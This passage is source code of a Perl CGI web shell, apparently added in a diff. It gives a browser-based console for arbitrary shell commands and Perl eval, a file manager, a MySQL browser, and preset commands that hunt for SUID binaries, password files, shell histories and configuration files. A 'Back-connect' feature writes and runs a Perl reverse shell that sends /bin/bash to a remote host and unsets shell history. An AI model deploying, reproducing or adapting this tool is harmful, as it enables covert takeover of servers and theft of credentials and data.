value=tar>Compress [tar.gz]</option><option value=untar>Uncompress [tar.gz]</option></select><input type=submit value='>>' onclick='validate()'></tr></form>$dive";sub wr_cur {if (!-w $CurrentDir){print '<font color=#FF0000>[Not writable]</font>';}else{print '<font color=#25ff00>[Writeable]</font>';}}sub PrintVar{print <<END;
+<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100%  style='border-top:2px solid #333;border-bottom:2px solid #333;'><tr><td><form method=POST><span>Change dir:</span><br><input class=toolsInp type=text name=cc value=$CurrentDir><input type=submit value='>>'><input type=hidden name=a value=command><input type=hidden name=d value=$CurrentDir><input type=hidden name=c value="changedir"></form></td><td><form method=POST><span>Read file:</span><br><input class='toolsInp' type=text name=path><input type=hidden name=a value=view_file><input type=hidden name=d value=$CurrentDir><input type=submit value='>>'></form></td></tr><tr><td><form method=POST><span>Make dir:</span>
+END
+wr_cur();print <<END;
+<br><input class='toolsInp' type=text name=md><input type=hidden name=a value=command><input type=hidden name=d value=$CurrentDir><input type=hidden name=c value="makedir"><input type=submit value='>>'></form></td><td><form method=POST><span>Make file:</span>
+END
+wr_cur();print <<END;
+<br><input class='toolsInp' type=text name=mf><input type=hidden name=a value=command><input type=hidden name=d value=$CurrentDir><input type=hidden name=c value="makefile"><input type=submit value='>>'></form></td></tr><tr><td><form name="ff" method="POST"><span>Execute:</span><br><input type="hidden" name="a" value="command"><input type="hidden" name="d" value="$CurrentDir"><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td>
+<td>
+END
+&PrintFileUploadForm;print <<END;
+</td>$tabe
+END
+}sub PrintFileUploadForm{print <<END;
+<span>Upload file: </span>
+END
+wr_cur();print <<END;
+<br><form name="upload_file_form" enctype="multipart/form-data" method="POST"><input type="file" name="f" class=toolsInp><input type="submit" value=">>"><input type="hidden" name="d" value="$CurrentDir"><input type="hidden" name="a" value="upload"></form><script>function setCookie(name,value,expires,path,domain,secure){document.cookie=name+"="+escape(value)+((expires)?";expires="+expires:"")+((path)?";path="+path:"")+((domain)?";domain="+domain:"")+((secure)?";secure":"");}function validate(form){var namelist='';var names=document.getElementsByName('lo');  var lo=document.getElementsByName('zip');for(var i=0;i<names.length;i++){if(names[i].checked){namelist+=lo[i].value+' ';}}setCookie("f",namelist,"","/");}function sall(form){var namelist='';var ch=true;var names=document.getElementsByName('lo');var ss=document.getElementsByName('ch11');if(ss[0].checked){ch=true;}else{ch=false;}for(var i=0;i<names.length;i++){names[i].checked=ch;}}</script>
+END
+}&PrintVar;}sub ah($){(my $str=shift)=~ s/(.|\n)/sprintf("%02lx", ord $1)/eg;return $str;}sub ha($){(my $str=shift)=~s/([a-fA-F0-9]{2})/chr(hex $1)/eg;return $str;}sub ConsoleP{print <<END;
+<tr><td><form name="run" method="POST"><br><input type=text size="2" id="sub3" disabled value='\$ '><input type="hidden" name="a" value="command1"><input type="hidden" name="d" value="$CurrentDir"><input type=text name="c" class=toolsInp1 id='lsname' onkeypress="s(event)" value=''><input type=submit class=toolsInp1 id="sub4" value=''></form></td></tr>$tab<td><form name="alias" method="POST"><br><input type="hidden" name="a" value="command1"><input type="hidden" name="d" value="$CurrentDir"><select name=aliases id='nnname' class=toolsInp><option value="ls -lha">List dir</option><option value="lsattr -va">list file attributes on a Linux second extended file system</option><option value="netstat -an | grep -i listen">show opened ports</option><option value="ps aux">process status</option><optgroup label="-Find-"></optgroup><option value="find / -type f -perm -04000 -ls">find all suid files</option><option value="find . -type f -perm -04000 -ls">find suid files in current dir</option><option value="find / -type f -perm -02000 -ls">find all sgid files</option><option value="find . -type f -perm -02000 -ls">find sgid files in current dir</option><option value="find / -type f -name config.inc.php">find config.inc.php files</option><option value="find / -type f -name &quot;config*&quot;">find config* files</option><option value="find . -type f -name &quot;config*&quot;">find config* files in current dir</option><option value="find / -perm -2 -ls">find all writable folders and files</option><option value="find . -perm -2 -ls">find all writable folders and files in current dir</option><option value="find / -type f -name service.pwd">find all service.pwd files</option><option value="find . -type f -name service.pwd">find service.pwd files in current dir</option><option value="find / -type f -name .htpasswd">find all .htpasswd files</option><option value="find . -type f -name .htpasswd">find .htpasswd files in current dir</option><option value="find / -type f -name .bash_history">find all .bash_history files</option><option value="find . -type f -name .bash_history">find .bash_history files in current dir</option><option value="find / -type f -name .fetchmailrc">find all .fetchmailrc files</option><option value="find . -type f -name .fetchmailrc">find .fetchmailrc files in current dir</option><optgroup label="-Locate-"></optgroup><option value="locate httpd.conf">locate httpd.conf files</option><option value="locate vhosts.conf">locate vhosts.conf files</option><option value="locate proftpd.conf">locate proftpd.conf files</option><option value="locate psybnc.conf">locate psybnc.conf files</option><option value="locate my.conf">locate my.conf files</option><option value="locate admin.php">locate admin.php files</option><option value="locate cfg.php">locate cfg.php files</option><option value="locate conf.php">locate conf.php files</option><option value="locate config.dat">locate config.dat files</option><option value="locate config.php">locate config.php files</option><option value="locate config.inc">locate config.inc files</option><option value="locate config.inc.php">locate config.inc.php</option><option value="locate config.default.php">locate config.default.php files</option><option value="locate config">locate config* files </option><option value="locate '.conf'">locate .conf files</option><option value="locate '.pwd'">locate .pwd files</option><option value="locate '.sql'">locate .sql files</option><option value="locate '.htpasswd'">locate .htpasswd files</option><option value="locate '.bash_history'">locate .bash_history files</option><option value="locate '.mysql_history'">locate .mysql_history files</option><option value="locate '.fetchmailrc'">locate .fetchmailrc files</option><option value="locate backup">locate backup files</option><option value="locate dump">locate dump files</option><option value="locate priv">locate priv files</option></select><input type=submit id="sub2" value='>>'></form></td><td><form name="l11" method="POST"><br><input type="hidden" name="a" value="command1"><input type="hidden" name="d" value="$CurrentDir"><select name=l11 id='l11' class=toolsInp>
+END
+print "<option value=".$last[-1].">".$last[-1]."</option>";foreach $arg(@last){print "<option value=\"$arg\">$arg</option>";}print <<END;
+</select><input type=submit id="sub5" value='>>'></form></td>$tabe<script>document.getElementById('sub3').style.borderColor='#444';document.getElementById('sub2').style.borderColor='#333';document.getElementById('lsname').style.borderColor='#333';document.getElementById('nnname').style.borderColor='#333';document.getElementById('sub4').style.borderColor='#333';document.getElementById("lsname").style.backgroundColor='#333';document.getElementById("l11").style.backgroundColor='#4444';document.getElementById("sub5").style.backgroundColor='#444';document.getElementById('l11').style.borderColor='#444';document.getElementById('sub5').style.borderColor='#444';document.getElementById("sub3").style.backgroundColor='#333';document.getElementById("sub3").style.borderColor='#333';document.getElementById("sub4").style.backgroundColor='#333';document.getElementById('lsname').focus();
+function s(e){window.scrollTo(0,document.body.scrollHeight);var u=e.keyCode?e.keyCode:e.charCode;var x=document.getElementById("l11").selectedIndex;var y=document.getElementById("l11").options;if(u==38){t=y[x+1].text;document.getElementById("lsname").value=t;document.getElementById("l11").selectedIndex=document.getElementById("l11").selectedIndex+1;}if(u==40){t=y[x-1].text;document.getElementById("lsname").value=t;document.getElementById("l11").selectedIndex=document.getElementById("l11").selectedIndex-1;}}</script>$dive
+END
+&PrintVar;}sub ft($){my $Fchmod=perm($_[0]);my $owner=owner($_[0]);if (!-w $_[0]){$wr='<font color=#FF0000>  Not writable</font>'}else{$wr='<font color=#25ff00>  Writeable</font>'}my $time=mt1((stat($_[0]))[8]);sub ffs{return '<font color=#df5>'}sub ffe{return '</font>'}$ffs=ffs();$ffe=ffe();$size1=(stat $_[0])[7]/1024;if($size1<1000){$size=sprintf("%.2f",($size1))." KB";}else{$size=sprintf("%.2f",($size1/1024))." MB"}my $ctime=mt1((stat($_[0]))[10]);my $motime=mt1((stat($_[0]))[9]);print "<div class=content>$tab<td><b>$ffs Name: $ffe</b>$TransferFile</td><td><b>$ffs Size: $ffe</b>$size</td><td><b>$ffs Permission: $ffe</b>$owner</td><td><b>$ffs Access time: $ffe</b>$time</td>$tabe$tab<td><b>$ffs Create time: $ffe</b>$ctime</td><td><b>$ffs Modify time: $ffe</b>$motime</td><td>$wr$tabe</td><table id=toolsTbl cellpadding=0 cellspacing=0 width=100%  style='border-top:2px solid #333;border-bottom:2px solid #333;'><td><table cellpadding=3 cellspacing=3><tr><td><form name=run method=POST><input type=hidden name=a value=command><input type=hidden name=d value=$CurrentDir><input type=hidden name=c value=rename_file><input type=hidden name=path value=".$_[0]."><input type=text size=20 name=rename_file value=$TransferFile><input type=submit value=RENAME></form></td><td><form name=run method=POST><input type=hidden name=a value=command><input type=hidden name=d value=$CurrentDir><input type=hidden name=c value=touch_file><input type=hidden name=path value=".$_[0]."><input type=text size=20 name=touch_file value='$motime'><input type=submit value=TOUCH></form></td><td><form name=run method=POST><input type=hidden name=a value=command><input type=hidden name=d value=$CurrentDir><input type=text size=20 name=chmod value=$Fchmod><input type=hidden name=path value=".$_[0]."><input type=hidden name=c value=chmod_file><input type=submit value=CHMOD></form></td><td><form name=run method=POST><input type=hidden name=a value=download><input type=hidden name=f value=$TransferFile><input type=hidden name=d value=$CurrentDir><input type=hidden name=path value=$TransferFile><input type=submit value=DOWNLOAD></form></td><td><form name=run method=POST><input type=hidden name=a value=view_file><input type=hidden name=d value=$CurrentDir><input type=hidden name=path value=$TransferFile><input type=submit value=VIEW></form></td><td><form name=run method=POST><input type=hidden name=a value=edit_file_path><input type=hidden name=d value=$CurrentDir><input type=hidden name=path value=$TransferFile><input type=submit value=EDIT></form></td>$tabe</td>$tabe</div>";}sub RTP_EDIT{$TransferFile=$ViewF;my $path=$CurrentDir."/".$TransferFile;ft($path);}sub RT{&PrintPageHeader;print "<h1>File operations:</h1>";my $path=$CurrentDir."/".$TransferFile;ft($path);&PrintVar;&PrintPageFooter;}sub Console{&PrintPageHeader;print "<h1>Console:</h1>";print "$div<font style=\"font:9pt Monospace,'Courier New';\">";$Prompt="[$ServerName $CurrentDir]";print "$Prompt</font>";ConsoleP();&PrintPageFooter;}sub CommandTimeout{if(!$WinNT){alarm(0);print "</xmp>Command exceeded maximum time of$CommandTimeoutDuration second(s).<br>Killed it!";ConsoleP();exit;}}sub file_header{print "<h1>File manager</h1>$div<table width=100% class=main cellspacing=0 cellpadding=0><tr><th width='13px'><input type=checkbox class=chkbx name=ch11 onclick='sall()'></th><th>&nbsp;Name</th><th>Size</th><th>Modify</th><th>Owner/Group</th><th>Permissions</th><th>Actions</th></tr>";}sub history{&GetCookies;my $h=$Cookies{'last_command'};my $x=length $h;$h=ha $h;if($x<3500){$h.=$RunCommand."ussr"}else{$h=$RunCommand."ussr"}@last=split(/ussr/,$h);$h=ah $h;print <<END;
+<script>function setCookie(name,value,expires,path,domain,secure){document.cookie=name+"="+escape(value)+((expires)?";expires="+expires:"")+((path)?";path="+path:"")+((domain)?";domain="+domain:"")+((secure)?";secure":"");}setCookie("last_command","$h","","/");</script>
+END
+}sub ExecuteCommand1{if($RunCommand =~ m/^\s*cd\s+(.+)/gis){$CurrentDir=~s!\Q//!/!g;if (!-r $1){$RunCommand="Can't read $1!";chop($CurrentDir=`$Command`)}else{$OldDir=$CurrentDir;$Command="cd \"$CurrentDir\"".$CmdSep."cd $1".$CmdSep.$CmdPwd;chop($CurrentDir=`$Command`)}&PrintPageHeader("c");print "<h1>Console:</h1>$div";$Prompt = $WinNT ? "$OldDir> " : "[$ServerName $OldDir]\$ ";print "$Prompt $RunCommand";}else{&PrintPageHeader("c");&history;print "<h1>Console:</h1>$div";$Prompt = $WinNT ? "$CurrentDir> " : "[$ServerName $CurrentDir]\$ ";print "$Prompt $RunCommand<pre>";$Command = "cd \"$CurrentDir\"".$CmdSep.$RunCommand.$Redirector;if(!$WinNT){$SIG{'ALRM'}=\&CommandTimeout;alarm($CommandTimeoutDuration);}if($ShowDynamicOutput){$|=1;$Command .= " |";open(CommandOutput, $Command);while(<CommandOutput>){$_=~s/(\n|\r\n)$//;print "$_\n";}$|=0;}else{print `$Command`;}if(!$WinNT){alarm(0);}print "</pre>";}ConsoleP();&PrintPageFooter;}sub ExecuteCommand{my $path=$in{'path'};$CurrentDir=$in{'d'};$CurrentDir=~s!\Q//!/!g;if($RunCommand eq "changedir"){$RunCommand="cd $ChangeDir";}elsif($RunCommand eq "makedir"){$RunCommand="mkdir $MkDir";}elsif($RunCommand eq "makefile"){$RunCommand="touch $MakeFile";}elsif($RunCommand eq "zip"){$RunCommand="tar cfz ".$ZipArch.".tar.gz ".$ZipFile;}elsif($RunCommand eq "unzip"){$RunCommand = "tar xfz ".$UnZipArch;}elsif($RunCommand eq "delfile"){$RunCommand="rm ".$DelFile;}elsif($RunCommand eq "deldir"){$RunCommand = "rm -rf ".$DelDir;}elsif($RunCommand eq "chmod_file"){my $tempt=$in{'chmod'};$RunCommand="chmod $tempt $path";}elsif($RunCommand eq "rename_file"){my $rtempt=$in{'rename_file'};$RunCommand="mv $path $CurrentDir/$rtempt";}elsif($RunCommand eq "touch_file"){my $ttempt=$in{'touch_file'};$ttempt=~s!\Q-!!g;$ttempt=~s!\Q:!!g;$ttempt=~s/ //g;my $ar=substr($ttempt,12);my $al=substr($ttempt,0,12);$ttempt=$al.".".$ar;$RunCommand = "touch -t $ttempt $path";}if($RunCommand =~ m/^\s*cd\s+(.+)/){$OldDir = $CurrentDir;$Command = "cd \"$CurrentDir\"".$CmdSep."cd $1".$CmdSep.$CmdPwd;chop($CurrentDir = `$Command`);&PrintPageHeader("c");file_header();print "<font size=1>";$Prompt = $WinNT ? "$OldDir> " : "[$ServerName $OldDir]\$ ";print "$Prompt $RunCommand";}else{&PrintPageHeader("c");file_header();print "<font size=1>";$Prompt = $WinNT ? "$CurrentDir> " : "[$ServerName $CurrentDir]\$ ";print "$Prompt $RunCommand<pre>";$Command = "cd \"$CurrentDir\"".$CmdSep.$RunCommand.$Redirector;if(!$WinNT){$SIG{'ALRM'} = \&CommandTimeout;alarm($CommandTimeoutDuration);}if($ShowDynamicOutput){$|=1;$Command .= " |";open(CommandOutput, $Command);while(<CommandOutput>){$_ =~ s/(\n|\r\n)$//;print "$_\n";}$|=0;}else{	print `$Command`;}if(!$WinNT){alarm(0);}print "</pre>";}print "</font>";&PrintCommandLineInputForm;&PrintPageFooter;}sub SendFileToBrowser($){open (FILE, $_[0]);local ($/);$file=<FILE>;close (FILE);($f=$_[0])=~m!([^/^\\]*)$!;print "Content-type: application/x-unknown\n";print "Content-Disposition: attachment;filename=".$1."\n";print "Content-Description: File to download\n\n";print $file;}sub SystemInfo{sub langs{$s="which gcc perl python php tar zip";$s.=" -U $q{u}"if($q{u});return $s;}sub hdd{$s="df -h";$s.=" -U $q{u}"if($q{u});return $s;}sub hdd1{$s="mount";$s.=" -U $q{u}"if($q{u});return $s;}sub perlv{$s="perl -v";$s.=" -U $q{u}"if($q{u});return $s;}sub phpv{$s="php -v";$s.=" -U $q{u}"if($q{u});return $s;}sub hosts{$s="cat /etc/hosts";$s.=" -U $q{u}"if($q{u});return $s;}sub downloaders{$s="which lynx links wget GET fetch curl";$s.=" -U $q{u}"if($q{u});return $s;}sub httpd{$s="locate httpd.conf";$s.=" -U $q{u}"if($q{u});return $s;}$langs=langs();$httpd=httpd();$hdd1=hdd1();$hdd=hdd();$perlv=perlv();$phpv=phpv();$hosts=hosts();$downloaders=downloaders();&PrintPageHeader("c");print "<h1>System information</h1>";print "$div$tab<td><span>HDD[mount]:</span>$div";P(`$hdd1`);print "$dive</td><td><span>HDD[df -h]:</span>$div";P(`$hdd`);print "<tr><td><span>PATHS:</span>$div";P(`$langs`);print "$dive</td><td><span>DOWNLOADERS:</span>$div";P(`$downloaders`);print "$dive</td></tr><tr><td><span>PERL version:</span>$div";P(`$perlv`);print "$dive</td><td><span>PHP version:</span>$div";P(`$phpv`);print "$dive</td></tr><tr><td><span>/etc/hosts:</span>$div";P(`$hosts`);print "$dive</td><td><span>httpd.conf:</span>$div";P(`$httpd`);print "$dive</td></tr>$tabe$dive";&PrintPageFooter;}sub sql_loginform{print "<h1>DataBases manager</h1>";&GetCookies;$hhost=$Cookies{'hhost'};$pport=$Cookies{'pport'};$usser=$Cookies{'usser'};$passs=$Cookies{'passs'};$dbb=$Cookies{'dbb'};if (!$hhost){$hhost='localhost'};if (!$pport){$pport='3306'};if (!$usser){$usser='root'};print <<END;
+<form name='sf' method='post'><table cellpadding='2' cellspacing='0'><tr><td>Type</td><td>Host</td><td>Port</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr><td><select name='type' id='nname'><option value='mysql' selected>MySql</option><option value='pgsql'>PostgreSql</option></select></td><td><input type=text name=sql_host value=$hhost></td><td><input type=text name=sql_port value=$pport></td><td><input type=text name=sql_login value=$usser></td><td><input type=text name=sql_pass value=$passs></td><td><input type=text name=sql_db value=$dbb></td><input type="hidden" name="d" value="$CurrentDir"><input type="hidden" name="a" value="sql_connect"><td><input type=submit value='>>'></td></tr>$tabe</form><br><script>document.getElementById('nname').focus();</script>
+END
+}sub sql{use DBI;&PrintPageHeader("p");sql_loginform();sql_query_form();&PrintVar;&PrintPageFooter;}sub sql_vars_set{$hhost=$in{'sql_host'};$pport=$in{'sql_port'};$usser=$in{'sql_login'};$passs=$in{'sql_pass'};$dbb=$in{'sql_db'};}sub sql_query_form{ print <<END;
+<form name='querys' method='post'><textarea name='query' style='width:100%;height:60px'></textarea><br/>
+<input type=submit value='Query'>  <input type="hidden" name="d" value="$CurrentDir"><input type="hidden" name="a" value="sql_query"></form>
+END
+}sub sql_cq_form {print <<END;
+$tab<td><span>Get data from columns:</span></td><td><form name='cquerys' method='post'><textarea name='cquery' id='cquery' cols=40 style='width:100%;height:60px'></textarea><br/><input type="hidden" name="a" value="sql_query">
+  <input type="hidden" name="d" value="$CurrentDir"><input type=submit value='Query'></form></td>$tabe
+END
+}sub sql_databases_form{print '<tr><form method=post name=dd'.$$ref[0].'><input type="hidden" name="a" value="sql_databases"><input type=hidden name=database value='.$$ref[0].'><input type="hidden" name="d" value="'.$CurrentDir.'"><td></font><font face="Verdana" size="1">['.$s4et.']</font></td><td><a href="javascript:document.dd'.$$ref[0].'.submit()"><font face="Verdana" size="1">'.' '.$$ref[0].'</font></a></td></form></tr>';}sub sql_tables_form {print '<tr><form method=post name=tt'.$$ref[0].'><input type="hidden" name="a" value="sql_tables"><input type=hidden name=table value='.$$ref[0].'><input type="hidden" name="d" value="'.$CurrentDir.'"><td></font><font face="Verdana" size="1">['.$s4et.']</font></td><td><a href="javascript:document.tt'.$$ref[0].'.submit()"><font face="Verdana" size="1">'.' '.$$ref[0].'</font></a></td></form></tr>';}sub sql_columns_form{print '<script>function lol'.$s4et.'(f){if (f.checked){var cn=document.getElementById("cquery").value;if (cn!==""){document.cquerys.cquery.value=cn+","+f.id;}else{document.cquerys.cquery.value=f.id;}}else{exit;}}</script><tr><form method=post name=cc'.$$ref[0].'><input type="hidden" name="a" value="sql_columns"><input type=hidden name=column value='.$$ref[0].'><input type="hidden" name="d" value="'.$CurrentDir.'">';print '<td></font><font face="Verdana" size="1">['.$s4et.']</font></td><td><input type=checkbox id='.$$ref[0].' name=c'.$$ref[0].' onClick="lol'.$s4et.'(this.form.c'.$$ref[0].')"></td><td><a href="javascript:document.cc'.$$ref[0].'.submit()"><font face="Verdana" size="1">'.$$ref[0].'</font></a></td></form><tr>';}sub sql_data_form {print '<tr><form method=post name=dt'.$$ref[0].'><input type="hidden" name="d" value="'.$CurrentDir.'"><td><font face=Verdana size=1>[$s4et] </font></td><td><font face=Verdana size=1>'.$$ref[0].'</font></td></form></tr>';}sub NetPrint{&PrintPageHeader("p");NetForm();&PrintPageFooter;}sub NetForm {$rip = $ENV{'REMOTE_ADDR'};print <<END;
+<h1>Back-connect  [perl]</h1><br/><form name='nfp' method=post>Server: <input type='text' name='server' value=$rip> Port: <input type='text' name='ppport' value=31337><input type="hidden" name="a" value="net_go"><input type=submit value='>>'></form><br>
+END
+&PrintVar;}sub back{open(FILE,">/tmp/bbc.pl");$bbc = '#!/usr/bin/perl use IO::Socket;$system="/bin/bash";use Socket;use FileHandle;socket(SOCKET,PF_INET,SOCK_STREAM,getprotobyname("tcp")) or die print "[-] Unable to Resolve Host\n";connect(SOCKET,sockaddr_in("'.$port.'",inet_aton("'.$target.'"))) or die print "[-] Unable to Connect Host\n";SOCKET->autoflush();open(STDIN, ">&SOCKET");open(STDOUT,">&SOCKET");open(STDERR,">&SOCKET");system("unset HISTFILE;unset SAVEHIST;echo PPS 3.0 backconnect:;pwd;");system($system);';print FILE $bbc;close(FILE);system("chmod 777 /tmp/bbc.pl;perl /tmp/bbc.pl $target $port");exit;}sub NetGo{&PrintPageHeader("c");$target =  $in{'server'};$port =  $in{'ppport'};NetForm();back();&PrintPageFooter;}sub EvalCodePrint{&PrintPageHeader("p");EvalCodeForm();&PrintPageFooter;}sub EvalCodeForm{print <<END;
+<h1>Execution PERL-code</h1><form name=pf method=post><textarea name=code class=bigarea id=PerlCode></textarea><input type="hidden" name="a" value="eval_code"><input type=submit value=Eval style="margin-top:5px">
+END
+}sub EvalCode{&PrintPageHeader("c");EvalCodeForm();$ccode =  $in{'code'};print "<br>Result:<br>";eval $ccode;&PrintPageFooter;}sub EditFilePathForm {print <<END;
+<code><br><form name=pfsd method=post>$Prompt<input type="text" name=path id=edit1_file><input type="hidden" name="a" value="edit_file_path"><input type="hidden" name="d" value="$CurrentDir"><input type=submit value=MakeDir></form></code>
+END
+}sub EditFilePath{$fpath="";$fpath = $CurrentDir."/".$ViewF;EditFilePrint();}sub EditFilePrint{&PrintPageHeader("p");EditFileForm();&PrintPageFooter;}sub EditFileForm{open(FILE, $fpath);@file = <FILE>;$fccodde = HtmlSpecialChars(join('', @file));print '<h1>File tools:</h1>';&RTP_EDIT;print <<END;
+<div class=content><form name=pf11 method=post><textarea name=ccode class=bigarea id=editfile>$fccodde</textarea><input type="hidden" name="a" value="edit_file"><input type=hidden name=path value=$fpath><input type="hidden" name="d" value="$CurrentDir"><input type=submit value=Save style="margin-top:5px"></form></div>
+END
+&PrintVar;&PrintPageFooter;}sub ViewFile{$fpath=$CurrentDir."/".$ViewF;&PrintPageHeader("c");open(FILE,$fpath);@file=<FILE>;$fccodde=join('',@file);$fccodde=HtmlSpecialChars($fccodde);print '<h1>File tools:</h1>';&RTP_EDIT;print decode_base64("PHNjcmlwdD5mdW5jdGlvbiBjb2xvcihjb2RlKXt2YXIgcz1bXTt2YXIgYz0iJyI7cmV0dXJuIGNvZGUucmVwbGFjZSgvXGIoY2FzZXxjYXRjaHxjb250aW51ZXxkb3xlbHNlfGVsaWZ8ZWxzZWlmfGZvcnxmb3JlYWNofGlmfHN3aXRjaHx0cnl8dHlwZW9mfHZhclxzfHdoaWxlfHdpdGh8YnJlYWt8aW5jbHVkZXxyZXF1aXJlfHJlcXVpcmVfb25jZXxmb3BlbnxmcHV0c3xce3xcfSlcYi9naW0sJzxzcGFuPiQxPC9zcGFuPicpLnJlcGxhY2UoLyh7fH0pL2dpbSwnPHNwYW4+JDE8L3NwYW4+JykucmVwbGFjZSgvXGIoZnVuY3Rpb258c3VifGRlZnx2b2lkfGludHxyZXR1cm58ZXZhbHxhc3NlcnR8ZXhlY2x8ZXhlY3YpXGIvZ2ltLCc8Yj48Zm9udCBjb2xvcj0jMDBmZmZmPiQxPC9mb250PjwvYj4nKS5yZXBsYWNlKC9cYihwcmludHxwcmludGZ8ZWNob3xzcHJpbnRmfGZwcmludGYpXGIvZ2ltLCc8Yj48dT4kMTwvdT48L2I+JykucmVwbGFjZSgvKFwkW19hLXowLTldKikvZ2ltLCc8Yj48Zm9udCBjb2xvcj0jOThmYjk4PiQxPC9mb250PjwvYj4nKS5yZXBsYWNlKC9cYigweFtcZGEtZl0rfFxkKylcYi9naW0sICc8Zm9udCBjb2xvcj0jZmZhMDdhPiQxPC9mb250PicpLnJlcGxhY2UoLzxyKFxkKyk+L2dpbSxmdW5jdGlvbihtYXRjaCxpZCl7dmFyIHI9c1tpZC0xXTt2YXIgY3NzPXIubWF0Y2goL14oXC9cL3xcL1wqfC0pLyk/J2NvbW1lbnQnOnIubWF0Y2goL15bJiddLyk/J3N0cmluZyc6J3JlZ2V4cCc7cmV0dXJuICc8c3BhbiBjbGFzcz0iJytjc3MrJyI+JytyKyc8L3NwYW4+Jzt9KX07ZnVuY3Rpb24gY2hhbmdlVGV4dCgpe3ZhciBhPWRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdjY2NvZGVlJykuaW5uZXJIVE1MO2E9Y29sb3IoYSk7ZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ2NjY29kZWUnKS5pbm5lckhUTUw9YTt9PC9zY3JpcHQ+");
+print"<div class=content><pre class=ml1 id='cccodee'>$fccodde</pre></div>";&PrintVar;&PrintPageFooter;}sub EditFile {&PrintPageHeader("c");$fccode=$in{'ccode'};$ffpath=$in{"path"};print <<END;
+<h1>File: $ffpath saved</h1><form name=pf11 method=post><textarea name=ccode class=bigarea id=editfile>$fccode</textarea><input type="hidden" name="a" value="filemanager"><niput type=hidden name=path value=$ffpath><input type="hidden" name="ddd" value="$ViewF"><input type="hidden" name="d" value="$CurrentDir"><input type=submit value=Files style="margin-top:5px"></form>
+END
+open(FFF,"> $ffpath");print FFF DeHtmlSpecialChars($fccode);close(FFF);&PrintVar;&PrintPageFooter;}sub sql_columns{&GetCookies;$hhost=$Cookies{'hhost'};$pport=$Cookies{'pport'};$usser=$Cookies{'usser'};$passs=$Cookies{'passs'};$dbb=$Cookies{'dbb'};$table=$Cookies{'table'};&PrintPageHeader("c");sql_vars_set();sql_loginform();$column=$in{'column'};print <<END;
+<script>function setCookie(name,value,expires,path,domain,secure){document.cookie=name+"="+escape(value)+((expires)?";expires="+expires:"")+((path)?";path="+path:"")+((domain)?";domain="+domain:"")+((secure)?";secure":"");}setCookie("column","$column","","/");</script>
+END
+print "<table width=100%>";print '<font face="Verdana" size="1">';$dbh = DBI->connect("DBI:mysql:$dbb:$hhost:$pport",$usser,$passs);$sth = $dbh->prepare("SHOW DATABASES");$sth->execute;print "<b>DATABASES:</b><br>";print "<td><table border=1 cellspacing=0 cellpadding=1>";while ($ref = $sth->fetchrow_arrayref){$s4et++;sql_databases_form();}$rc=$sth->finish;print "$tabe</td><td><table width=100%>";sql_query_form();print "$tabe</td>$tabe";$s4et = 0;$sth = $dbh->prepare("SHOW TABLES FROM $dbb");$sth->execute;print $tabe;print "<b>Tables from $dbb:</b><br>";print "<table border=1 cellspacing=0 cellpadding=1 cols=4>";print "<td><table border=1 cellspacing=0 cellpadding=1 cols=2>";while ($ref = $sth->fetchrow_arrayref){$s4et++;sql_tables_form();}$rc=$sth->finish;print "$tabe</td><td><table border=1 cellspacing=0 cellpadding=1 cols=2>";$s4et=0;$sth = $dbh->prepare("show columns from $table from $dbb");$sth->execute;while ($ref = $sth->fetchrow_arrayref){$s4et++; sql_columns_form();}$rc=$sth->finish;print "$tabe</td>";$s4et = 0;$zapros = "SELECT $column FROM `".$dbb."`.`".$table."` LIMIT 0,30";print '<script>document.querys.query.value="'.$zapros.'";</script>';$sth = $dbh->prepare($zapros);$sth->execute;print "<td><table border=1 cellspacing=0 cellpadding=1 cols=2>";while ($ref = $sth->fetchrow_arrayref){$s4et++;sql_data_form();}$rc = $sth->finish;$rc=$dbh->disconnect;print "$tabe</td>$tabe";&PrintPageFooter;}sub sql_tables{&GetCookies;$hhost=$Cookies{'hhost'};$pport=$Cookies{'pport'};$usser=$Cookies{'usser'};$passs=$Cookies{'passs'};$dbb=$Cookies{'dbb'};&PrintPageHeader("c");sql_vars_set();sql_loginform();$qqquery =  $in{'table'};print <<END;
+<script>function setCookie(name,value,expires,path,domain,secure){document.cookie=name+"="+escape(value)+((expires)?";expires="+expires:"")+((path)?";path="+path:"")+((domain)?";domain="+domain:"")+((secure)?";secure":"");}setCookie("table","$qqquery","","/");</script>
+END
+print "<table width=100%>";print '<font face="Verdana" size="1">';$dbh = DBI->connect("DBI:mysql:$dbb:$hhost:$pport",$usser,$passs);$sth=$dbh->prepare("SHOW DATABASES");$sth->execute;print "<b>DATABASES:</b><br>";print "<td><table border=1 cellspacing=0 cellpadding=1>";while ($ref=$sth->fetchrow_arrayref){$s4et++;sql_databases_form();}$rc=$sth->finish;print "$tabe</td><td><table width=100%><td>";sql_cq_form();print "</td><td>";sql_query_form();print "</td>$tabe</td>$tabe";$s4et=0;$sth=$dbh->prepare("SHOW TABLES FROM $dbb");$sth->execute;print "<b>Tables from $dbb:</b><br>";print "<table border=1 cellspacing=0 cellpadding=1 cols=4>";print "<td><table border=1 cellspacing=0 cellpadding=1 cols=2>";while ($ref = $sth->fetchrow_arrayref){$s4et++;sql_tables_form();}$rc=$sth->finish;print "$tabe</td><td><table border=1 cellspacing=0 cellpadding=1 cols=2>";$s4et=0;$zapros = "SHOW COLUMNS FROM `$qqquery` FROM `$dbb`";print '<script>document.querys.query.value="'.$zapros.'";</script>';$sth=$dbh->prepare($zapros);$sth->execute;while ($ref = $sth->fetchrow_arrayref){$s4et++;sql_columns_form();}$rc=$sth->finish;$rc=$dbh->disconnect;print "$tabe</td>$tabe";&PrintPageFooter;}sub sql_databases{sql_vars_set();&PrintPageHeader("c");sql_vars_set();sql_loginform();$ddb = $in{'database'};print <<END;
+<script>function setCookie(name,value,expires,path,domain,secure){document.cookie=name+"="+escape(value)+((expires)?";expires="+expires:"")+((path)?";path="+path:"")+((domain)?";domain="+domain:"")+((secure)?";secure":"");}setCookie("dbb","$ddb","","/");</script>
+END
